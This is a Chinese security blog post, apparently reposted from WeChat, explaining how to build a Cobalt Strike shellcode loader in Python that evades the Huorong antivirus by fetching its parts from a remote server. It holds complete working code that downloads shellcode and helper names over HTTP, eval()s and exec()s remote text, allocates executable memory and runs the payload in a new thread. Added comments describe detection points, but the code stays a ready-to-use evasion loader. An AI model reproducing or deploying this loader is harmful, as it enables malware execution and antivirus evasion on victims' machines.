灵感来自我之前玩csgo时用的一款叫neverlose的外挂,其实大多数的nb外挂做的都是云load注入
cs生成python shellcode
然后 shellcode放在公网服务器取名1.txt
# Stager script as pasted in the article (the paste has lost its indentation).
# Defender's reading: every sensitive piece (helper names, payload bytes) is
# pulled from a remote host at run time over cleartext HTTP, evaluated, copied
# into a writable+executable allocation and started as a new thread. Each of
# those steps is a well-known detection point; see the line comments below.
import requests
import ctypes
# Stage 1: cleartext HTTP GET of a text file. "ip" is a placeholder for the
# operator's server. Visible in proxy / DNS / NetFlow telemetry.
url = "http://ip/2.txt"
response = requests.get(url)
if response.status_code == 200:
# eval() on the raw response body: whatever the server returns is executed as a
# Python expression. In the article, 2.txt holds a three-element list of names.
variable_names = eval(response.text.strip())
# Pre-creates module globals with the downloaded names, all bound to None.
for var_name in variable_names:
globals()[var_name] = None
# Resolves kernel32 through ctypes and widens VirtualAlloc's return type so a
# 64-bit address is not truncated to a C int.
windll_obj = ctypes.windll
kernel32_obj = windll_obj.kernel32
kernel32_obj.VirtualAlloc.restype = ctypes.c_uint64
# Note the API name is still a plain string literal in this script, so it is
# present in the packaged file regardless of the remote indirection below.
func_name = "RtlMoveMemory"
print(f"Variable names: {variable_names}")
print(f"Function name: {func_name}")
# variable_names[2] was just bound to None in the loop above, so this lookup
# always yields None and the getattr() branch is taken.
move_func = globals().get(variable_names[2], None) # move_func
if move_func is None:
move_func = getattr(kernel32_obj, func_name)
# Stage 2: second cleartext GET; 1.txt is the payload as hex text (per the
# surrounding article, presumably generated by Cobalt Strike).
url = "http://ip/1.txt"
response = requests.get(url)
if response.status_code == 200:
shellcode_content = response.text.strip()
shellcode = bytes.fromhex(shellcode_content.replace("\x", ""))
# VirtualAlloc(NULL, size, MEM_COMMIT=0x1000, PAGE_EXECUTE_READWRITE=0x40):
# a private RWX region. RWX commits are a standard trigger for memory
# scanners and EDR telemetry (e.g. ETW / kernel callbacks on allocation).
memory_address = kernel32_obj.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
if not memory_address:
raise Exception("VirtualAlloc failed, invalid memory address")
print(f"Memory address allocated: {hex(memory_address)}")
# Copies the decoded payload into the RWX region via RtlMoveMemory.
buffer = ctypes.create_string_buffer(shellcode)
try:
move_func(ctypes.c_uint64(memory_address), buffer, len(shellcode))
except Exception as e:
print(f"Error: {e}")
raise
# CreateThread with the allocation as the start routine: the thread's start
# address is not backed by any module on disk ("unbacked executable memory"),
# a classic hunt indicator in EDR and memory forensics.
thread_handle = kernel32_obj.CreateThread(0, 0, ctypes.c_uint64(memory_address), 0, 0, 0)
# -1 is INFINITE: the stager blocks until the injected thread exits.
kernel32_obj.WaitForSingleObject(thread_handle, -1)
然后2.txt写报毒的函数
["windll_obj", "kernel32_obj", "move_func"]
具体代码做什么了呢
很简单 为了过静态我们使用云加载 这样把敏感函数和shellcode放在云上不就随便过
实际上动态的测试下只做命令行交互shell也不会报毒,就这么简单
如果调用powershell火绒还是会检测的
这样在vt上查,源码的报毒数就是0
所以现在就稍微改动一下
把源代码放到服务器3.txt
# Identical copy of the stager above; the article moves this text to the
# server as 3.txt so it is fetched and exec()ed at run time instead of being
# packaged on disk. Same behavioural footprint: cleartext HTTP, eval() of a
# downloaded expression, RWX allocation, thread created into unbacked memory.
import requests
import ctypes
# Stage 1: cleartext HTTP GET of a text file ("ip" is a server placeholder).
url = "http://ip/2.txt"
response = requests.get(url)
if response.status_code == 200:
# eval() on the raw response body: the server fully controls what runs here.
variable_names = eval(response.text.strip())
# Pre-creates module globals with the downloaded names, all bound to None.
for var_name in variable_names:
globals()[var_name] = None
# kernel32 via ctypes; VirtualAlloc's return type widened to 64 bits.
windll_obj = ctypes.windll
kernel32_obj = windll_obj.kernel32
kernel32_obj.VirtualAlloc.restype = ctypes.c_uint64
# The API name remains a literal string in the downloaded source.
func_name = "RtlMoveMemory"
print(f"Variable names: {variable_names}")
print(f"Function name: {func_name}")
# The global named by variable_names[2] was just set to None above, so the
# getattr() fallback is always taken.
move_func = globals().get(variable_names[2], None) # move_func
if move_func is None:
move_func = getattr(kernel32_obj, func_name)
# Stage 2: second cleartext GET; 1.txt carries the payload as hex text.
url = "http://ip/1.txt"
response = requests.get(url)
if response.status_code == 200:
shellcode_content = response.text.strip()
shellcode = bytes.fromhex(shellcode_content.replace("\x", ""))
# MEM_COMMIT (0x1000) + PAGE_EXECUTE_READWRITE (0x40): a private RWX region,
# a standard trigger for memory scanners and EDR allocation telemetry.
memory_address = kernel32_obj.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
if not memory_address:
raise Exception("VirtualAlloc failed, invalid memory address")
print(f"Memory address allocated: {hex(memory_address)}")
# Copies the decoded payload into the RWX region via RtlMoveMemory.
buffer = ctypes.create_string_buffer(shellcode)
try:
move_func(ctypes.c_uint64(memory_address), buffer, len(shellcode))
except Exception as e:
print(f"Error: {e}")
raise
# New thread whose start address lies in memory not backed by a module on
# disk -- a classic indicator for EDR and memory forensics.
thread_handle = kernel32_obj.CreateThread(0, 0, ctypes.c_uint64(memory_address), 0, 0, 0)
# -1 is INFINITE: blocks until the injected thread exits.
kernel32_obj.WaitForSingleObject(thread_handle, -1)
然后本地就留一个load
# The only piece that is packaged locally: a bare downloader that fetches
# Python source from the server and exec()s it in-process. The stager and
# everything it in turn downloads therefore never exist as files on the host,
# which the article credits for its clean static scan. Behavioural telemetry
# still sees it: a Python process making an outbound cleartext HTTP request
# and then (inside the exec()ed code) committing RWX memory and creating a
# thread into it. Cleartext HTTP also means the fetched source is visible
# on the wire and in proxy logs.
import requests
url = "http://ip/3.txt"
response = requests.get(url)
if response.status_code == 200:
remote_code = response.text
print("load:")
# The downloaded source is echoed to stdout before it runs -- useful for an
# analyst, since the second stage can be captured from the console output.
print(remote_code)
# exec() of a body received over the network: arbitrary remote code execution.
exec(remote_code)
else:
print(f"Failed : {response.status_code}")
打包出来就把火绒过掉了
原文始发于微信公众号(秋风的安全之路):如何在15分钟内写出cs免杀火绒
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。